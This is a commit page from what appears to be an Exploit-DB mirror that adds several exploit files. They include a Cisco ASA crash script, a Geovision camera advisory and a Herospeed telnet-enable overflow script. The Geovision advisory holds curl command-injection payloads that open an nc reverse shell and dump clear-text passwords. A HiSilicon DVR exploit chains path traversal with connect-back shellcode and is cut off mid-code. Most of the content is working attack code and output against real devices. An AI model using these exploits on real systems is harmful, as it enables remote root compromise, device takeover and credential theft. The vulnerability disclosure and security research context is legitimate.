bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-02-08

Browse source 
25 changes to exploits/shellcodes

QNAP NAS Devices - Heap Overflow

QNAP NVR/NAS - Buffer Overflow (PoC)
QNAP NVR/NAS Devices - Buffer Overflow (PoC)
Cisco ASA - Crash PoC
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption
Android - 'getpidcon' Permission Bypass in KeyStore Service
Multiple OEM - 'nsd' Remote Stack Format String (PoC)

HP-UX 11.0 - pppd Stack Buffer Overflow
HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow

SGI IRIX - 'LsD' Multiple Buffer Overflows
SGI IRIX - 'LsD' Multiple Local Buffer Overflows

PostScript Utilities - 'psnup' Argument Buffer Overflow
PostScript Utilities - 'psnup' Local Buffer Overflow

Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access
Geovision Inc. IP Camera & Video - Remote Command Execution
Axis SSI - Remote Command Execution / Read Files
Axis Communications MPQT/PACS - Heap Overflow / Information Leakage
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD
Uniview - Remote Command Execution / Export Config (PoC)
Vitek - Remote Command Execution / Information Disclosure (PoC)
Vivotek IP Cameras - Remote Stack Overflow (PoC)
Dahua Generation 2/3 - Backdoor Access
HiSilicon DVR Devices - Remote Code Execution

JiRos Banner Experience 1.0 - Unauthorised Create Admin
JiRos Banner Experience 1.0 - Unauthorized Create Admin
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting
Naukri Clone Script - Persistent Cross-Site Scripting
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting
Online Test Script 2.0.7 - 'cid' SQL Injection
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
This commit is contained in:
Offensive Security 2018-02-08 05:01:53 +00:00
parent 2b72bb6e36
commit 2c4b08963a
24 changed files with 3668 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
exploits/android/dos/43996.txt Normal file
View file

@ -0,0 +1,63 @@
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:
1. KeyStoreServiceReturnCode KeyStoreService::generateKey(const String16& name,
2. const hidl_vec<KeyParameter>& params,
3. const hidl_vec<uint8_t>& entropy, int uid,
4. int flags,
5. KeyCharacteristics* outCharacteristics) {
6. uid = getEffectiveUid(uid);
7. KeyStoreServiceReturnCode rc =
8. checkBinderPermissionAndKeystoreState(P_INSERT, uid, flags & KEYSTORE_FLAG_ENCRYPTED);
9. if (!rc.isOk()) {
10. return rc;
11. }
12. if ((flags & KEYSTORE_FLAG_CRITICAL_TO_DEVICE_ENCRYPTION) && get_app_id(uid) != AID_SYSTEM) {
13. ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
14. return ResponseCode::PERMISSION_DENIED;
15. }
16.
17. if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
18. if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
19. }
20. ...
21. }
Like most KeyStore calls, this method uses "KeyStoreService::checkBinderPermission" in order to validate the calling process's permissions. This function uses a twofold approach to verify the caller (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#checkBinderPermission):
1. The caller's UID is retrieved using IPCThreadState::self()->getCallingUid() and compared against an array of pre-populated UIDs and permissions ("user_perms")
1.1 If the UID matches any in the array, its permission set is retrieved from the array
1.2 If the UID isn't in the array, the default permission set is used ("DEFAULT_PERMS")
2. The caller's SELinux context is retrieved using getpidcon(...) using the PID from the binder transaction (IPCThreadState::self()->getCallingPid())
2.1 An SELinux access check is performed for the given context and operation
Specifically to our case, if a "generateKey" command is called with a "INCLUDE_UNIQUE_ID" tag, the KeyStore will use an attestation certificate for the generated key with an application-scoped and time-bounded device-unique ID. Since creating attestation keys is a privileged operation, it should not be carried out by any user.
This restriction is enforced using the SELinux context enforcement alone -- the "default" permission set ("DEFAULT_PERMS") contains the aforementioned permission:
static const perm_t DEFAULT_PERMS = static_cast<perm_t>(
P_GET_STATE | P_GET | P_INSERT | P_DELETE | P_EXIST | P_LIST | P_SIGN | P_VERIFY |
P_GEN_UNIQUE_ID /* Only privileged apps can do this, but enforcement is done by SELinux */);
As noted in the comment above, this API is restricted to "priv_app" SELinux contexts, which is enforced using validation #2 above.
However, using the calling PID in order to enforce access controls in binder calls is an invalid approach. This is since the calling PID can transition from zombie to dead, allowing other PIDs to take its place. Therefore, the following attack flow is possible:
1. Process A forks and creates process B
2. Process A cycles pids until it reaches the pid before its own
3. Process B issues a binder transaction for the KeyStore service, containing an INCLUDE_UNIQUE_ID tag
4. Process A kills process B, allowing it to transition to dead
5. Process A spawns a new "priv_app" instance, occupying process B's PID
If points 4-5 are completed before the KeyStore service performs the "getpidcon" call, the permission check will use the new app's SELinux context, allowing the access control checks to pass. Otherwise, since no ill effects happen if the race fails, an attacker can continue issuing calls until the race succeeds.
As for spawning a new "priv_app" instance, this can be achieved by issuing a query request to a content provider published by a "priv_app". Many such providers exist (the contacts provider, telephony provider, settings provider, etc.). In this case, I chose to use the "calendar" provider, as it was not running on the device to begin with (and is therefore had to be spawned in order to handle the query request).
In order to expand the timing window for the PoC, I've added a "sleep" call to the KeyStore service's "generateKey" call. You can find the patch under "keystore.diff".
After applying the patch, the attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/keystorerace", and running a build (e.g., "mmm keystorerace"). The resulting binary ("keystorerace") contains the PoC code. Running it should result in a new device-unique key being generated, despite not being executed from a "priv_app".
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43996.zip

0
exploits/linux/dos/40985.txt → exploits/hardware/dos/40985.txt
View file

35
exploits/hardware/dos/43986.py Executable file
View file

@ -0,0 +1,35 @@
#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#
import requests, sys
headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent
v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'
xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
"""
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
allow_redirects=False)
print(r.status_code)
print(r.headers)
print(r.text)

244
exploits/hardware/remote/43982.txt Normal file
View file

@ -0,0 +1,244 @@
[STX]
Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days
Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/
heap: Executable + Non-ASLR
stack: Executable + ASLR
Vulnerable:
Practically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.
Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19
Timeline:
November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'
November 8, 2017: Responce from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
(due to the easy exploiting and number of vulnerabilities in large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.
January 17, 2018: Thanked Geoviosion for good cooperation.
February 1, 2018: Full disclosure
-[Unathorized Access]-
1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN
2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply
3)
Unathorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm
4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c="
/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
Nov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]
5)
Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET)
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"
6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/System/reboot/description
PoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
Full recursive list: /PSIA/indexr
-[Remote Command Execution]-
7)
PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings,
including login and passwords in clear text by accessing the created Login.htm
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"
< HTTP/1.1 200 OK
...
-------------------------------------
- -
- Dump All Settings -
- -
-------------------------------------
...
8)
PoC will pop reverse connect back shell to 192.168.57.1
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55331.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
9)
/www/JpegStream.cgi
curl -v "http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55332.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
Problem(s):
SIiUTIL_GetDecryptData calling popen() "sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;..." without proper sanitation of user input
Note:
Vulnerable tags: 'username', 'password' and 'key'
-[Double free]-
10)
curl -v http://192.168.57.20:80/PSIA/System/configurationData
*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***
-[Stack Overflow]-
11)
/usr/local/thttpd
curl -v "http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en "X";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x0003889c in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x0 0
r1 0x369650 3577424
r2 0x1 1
r3 0x68 104
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0x3680e8 3571944
sp 0x7ee0fbc8 0x7ee0fbc8
lr 0x3889c 231580
pc 0x49494948 0x49494948
cpsr 0x20000030 536870960
(gdb)
12)
/usr/local/thttpd
curl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en "X"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x3e4c4d54 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0xffffffff 4294967295
r1 0x7e963e8c 2123775628
r2 0x0 0
r3 0x242 578
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0xa 10
sp 0x7e983c48 0x7e983c48
lr 0x3e4c4d54 1045187924
pc 0x49494948 0x49494948
cpsr 0x60000030 1610612784
(gdb)
13)
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en "A";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
14)
/www/Login3gpp.cgi
curl -v "http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---
15)
/www/Login.cgi
curl -v "http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
Note: username and password uses strcpy() and both are vulnerable.
However, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.
Have a nice day
/bashis
[ETX]

1090
exploits/hardware/remote/43983.py Executable file
View file

File diff suppressed because it is too large Load diff

179
exploits/hardware/remote/43997.py Executable file
View file

@ -0,0 +1,179 @@
#!/usr/bin/env python2.7
#
# Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd.
# Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
#
# [Verified]
# 1) Fullhan IPC FH8830_F22_W_7.1.42.1
# 2) Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
# 3) HiSilicon 3518EV200_OV9732_W_7.1.25.1, 3519V100_IMX274_W_7.1.39.3
# 4) Ambarella s2l55m_imx123_W_7.1.25.2, S2E66_IMX178_W_7.1.3.4
#
# Author: bashis <mcw noemail eu>, 2018
#
import socket
import select
import sys
import argparse
import base64
import struct
import time
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == "__main__":
INFO = '\n[Herospeed TelnetSwitch pwn (2018 bashis <mcw noemail eu>)]\n'
rhost = '192.168.57.20' # Default Remote HOST
rport = 787 # Default Remote PORT
BUFFER_SIZE = 1024
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: {}\n".format(str(e))
sys.exit(1)
print INFO
if args.rport:
rport = int(args.rport)
if args.rhost:
rhost = args.rhost
IP = args.rhost
# Check if RPORT is valid
if not Validate(True).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(True).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
timeout = 5
socket.setdefaulttimeout(timeout)
#
# [Payload]
#
LOGIN = "Lucky787" # Hardcoded login
#
# Fullhan IPC FH8830_F22_W_7.1.42.1
# Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
#
PASSWD = "\n\n\n\n\n\n\n\n\n\n\n\n" # Our new password, must be exactly 12 char, and must be '\n'
MESSAGE = ''+ LOGIN + ':' + PASSWD +''
BASE64_NULL = "A" * 232 # Decoded as 0x00 with base64 decode
HEAP_PWD = 0x00016c8c # Start of the dynamicly generated password, located on heap
#
# HiSilicon 3518EV200_OV9732_W_7.1.25.1
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00016990 # Start of the dynamicly generated password, located on heap
#
# HiSilicon 3519V100_IMX274_W_7.1.39.3
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x000267b0 # Start of the dynamicly generated password, located on heap
#
# Ambarella s2l55m_imx123_W_7.1.25.2
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00014c3c # Start of the dynamicly generated password, located on heap
#
# Ambarella S2E66_IMX178_W_7.1.3.4
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 108 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00014c68 # Start of the dynamicly generated password, located on heap
MESSAGE = base64.b64encode(bytes(MESSAGE))
MESSAGE += BASE64_NULL
#
# Since the stack overflow writing with only one byte, we need overwrite the password one char at the time (looping twelve times)
#
for where in range(0, len(PASSWD)):
OUT = "GET / HTTP/1.0\nAuthorization: Basic {}{}\n\n".format(MESSAGE,struct.pack('<L',HEAP_PWD)[:3])
print "Writing to: {}".format(hex(HEAP_PWD))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
s.send(OUT)
time.sleep(0.5)
response = s.recv(BUFFER_SIZE).split()
HEAP_PWD += 0x1 # Next address on heap
if response[1]:
if response[1] == "200":
print "({}) OK, telnetd should be open!".format(response[1])
break

297
exploits/hardware/remote/44004.py Executable file
View file

@ -0,0 +1,297 @@
#!/usr/bin/env python2
#
# pwn hisilicon dvr web service
#
from pwn import *
from time import sleep
import re
import argparse
import os
parser = argparse.ArgumentParser(description='exploit HiSilicon DVR devices')
parser.add_argument('--rhost', help='target host', required=True)
parser.add_argument('--rport', help='target port', default=80)
parser.add_argument('--lhost', help='connectback ip', required=True)
parser.add_argument('--lport', help='connectback port', default=31337)
parser.add_argument('--bhost', help='listen ip to bind (default: connectback)')
parser.add_argument('--bport', help='listen port to bind (default: connectback)')
parser.add_argument('-n', '--nolisten', help='do not start listener (you should care about connectback listener on your own)', action='store_true')
parser.add_argument('-i', '--interactive', help='select stack memory region interactively (rather than using autodetection)', action='store_true')
parser.add_argument('-p', '--persistent', help='make connectback shell persistent by restarting dvr app automatically (DANGEROUS!)', action='store_true')
parser.add_argument('-u', '--upload', help='upload tools (now hardcoded "./tools/dropbear" in script) after pwn', action='store_true')
parser.add_argument('--offset', help='exploit param stack offset to mem page base (default: 0x7fd3d8)', default=0x7fd3d8)
parser.add_argument('--cmdline', help='cmdline of Sofia binary on remote target (default "/var/Sofia")', default='/var/Sofia')
args = parser.parse_args()
target_host = args.rhost
target_port = int(args.rport)
sofia_cmdline = args.cmdline
if args.interactive:
getleak_interactive = True
else:
getleak_interactive = False
if args.persistent:
shell_persistent = True
else:
shell_persistent = False
if args.upload:
shell_upload = True
else:
shell_upload = False
connectback_host = args.lhost
connectback_port = int(args.lport)
if args.bhost:
listen_host = args.bhost
else:
listen_host = connectback_host
if args.bport:
listen_port = int(args.bport)
else:
listen_port = connectback_port
"""
vuln1: bof in httpd
-------------------
buffer overflow in builtin webserver binary `Sofia`
which can be exploited to run shellcode (as root) on the device.
PoC payload to cause a segfault:
payload = "GET " + "a"*299 + "xxxx" + " HTTP"
note, that in "xxxx" we can control pc register (program flow)!
there is no nx enabled, so executing shellcode in place of "a"*299
is possible. however, stack address leak is needed to defeat aslr.
vuln2: path traversal vuln in httpd
-----------------------------------
builtin webserver has a directory path traversal vulnerability
which can be exploited to leak arbitrary files.
note, that the webserver binary `Sofia` is running as root,
so exploiting this arbitrary file can be read from device fs.
PoC request "GET ../../etc/passwd HTTP" reads file "/etc/passwd".
Furthermore, dir listing is enabled as well.
by exploiting vuln2 we can defeat aslr needed to exploit vuln1.
namely, filesystem at /proc contains lots of information
about running processes, e.g. contains memory mappings:
request "GET ../../proc/[pid]/maps HTTP" reads memory
mapping of process with pid [pid]. obverving the memory
mapping patterns usually enough to defeat aslr (offset
from mem map base is the same, even in different versions).
"""
# get pid of running dvr binary '/var/Sofia'
def findpid():
with log.progress('getting pidlist') as logp:
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc HTTP')
pids = []
for line in r.recvall().splitlines():
res = re.match(r'.*\.\./\.\./proc/([0-9]+)"', line)
if res:
pids.append(int(res.group(1)))
r.close()
context.log_level = c
logp.success('found %d processes' % len(pids))
with log.progress("searching for PID of '%s'" % sofia_cmdline) as logp:
pid_sofia = None
pids.sort(reverse=True)
for pid in pids:
logp.status(str(pid))
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc/%d/cmdline HTTP' % pid)
resp = r.recvall().splitlines()
r.close()
context.log_level = c
if sofia_cmdline + '\x00' == resp[-1]:
pid_sofia = pid
logp.success(str(pid_sofia))
break
if not pid_sofia:
logp.failure('did not found')
return pid_sofia
def getmodelnumber():
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../mnt/custom/ProductDefinition HTTP')
for l in r.recvall(timeout=5).decode('ascii').replace(',', '\n').splitlines():
if "Hardware" in l:
modelnumber = l.split(":")[1].split('"')[1]
r.close()
context.log_level = c
return modelnumber
def guessregion(smaps):
for t in range(len(smaps)-7, 1, -1):
if (smaps[t][1][0], smaps[t+1][1][0], smaps[t+2][1][0], smaps[t+3][1][0], smaps[t+4][1][0], smaps[t+5][1][0], smaps[t+6][1][0]) == (8188, 8188, 8188, 8188, 8188, 8188, 8188) and smaps[t][1][1] == 4 and smaps[t+1][1][1] == 4 and smaps[t+2][1][1] == 4 and smaps[t+3][1][1] >= 8 and smaps[t+4][1][1] >= 4 and smaps[t+5][1][1] >= 4 and smaps[t+6][1][1] >= 8:
return (t+3)
return (-1)
# getting stack section base address
# 'k' defines the section which contains the stack
def getleak(pid, interactive):
with log.progress("getting stack section base") as logp:
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc/%d/smaps HTTP' % pid)
smaps = []
memStart = False
for line in r.recvall().splitlines():
if memStart:
t += (int(line.split()[1]),)
i += 1
#if i >= 14:
if i >= 7:
smaps.append((memStart, t))
memStart = False
if 'rwxp' in line:
memStart = int(line.split('-')[0], 16)
i = 0
t = ()
guess = guessregion(smaps)
if guess < 0 or interactive:
j = 0
for i in smaps:
print (j, hex(i[0]), i[1:])
j += 1
k = int(raw_input('enter stack region id (guessed value = %d): ' % guess))
else:
k = guess
leak = smaps[k][0]
r.close()
context.log_level = c
logp.success(hex(leak))
return leak
# connectback shellcode
# badchars: 0x00, 0x0d, 0x20, 0x3f, 0x26
def shellcode(lhost, lport):
badchars = [0x00, 0x0d, 0x20, 0x3f, 0x26]
badchars = map(chr, badchars)
